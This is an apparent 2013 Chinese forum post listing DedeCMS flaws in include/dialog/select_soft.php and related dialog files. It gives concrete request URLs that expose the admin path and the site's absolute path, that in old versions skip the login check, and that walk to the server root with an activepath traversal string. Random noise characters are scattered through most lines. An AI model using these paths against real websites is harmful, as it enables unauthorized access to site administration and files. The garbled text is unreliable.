1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理
/ B: Q9 @6 ?& P5 V* G
% p2 G4 u; b5 f" u: a, ], Z& q! y员帐号,新版本的就直接转向了后台./ d4 U3 [7 L/ k% g
6 A3 h5 k' k( S6 v0 A2.include/dialog/config.php会爆出后台管理路径
& v9 Z' S1 S, m, c6 L! O# C i; N. Z a# Z3 n) \
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
. j: ]9 X S+ E7 b2 U1 [) [8 A; I+ b1 Y) ^7 G
4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.4 l2 ]1 I, p. N% i4 o6 N9 d
4 M# i4 N. a# o! K( i+ W; C! _$ _5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉/ i9 c- h7 y1 v+ U
, h. k9 ^$ L& G; W1 j& @
到根目录去.不过这些版本的访问地址有些不同.
3 e8 Q# P# L' e/ ^0 _( m/ A地址为require/dialog/select_soft.php?activepath=/././././././././
1 L$ H' T7 q* Y
& S2 C K9 Z; `2 c" A$ ^include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..
2 R' k+ s5 O; ~4 s: W5 s存在相同问题的文件还有# p( s* M M% O, z* r2 R/ a
include\dialog\select_images.php
3 K' J( c1 P1 A# o9 t# [: c7 O; Cinclude\dialog\select_media.php
: F5 X) I5 @. ^* Finclude\dialog\select_templets.php& G. B3 t) I9 v8 }8 F4 |+ \) p' S, x
|
发表于 2013-4-16 16:50:43
收藏
支持
反对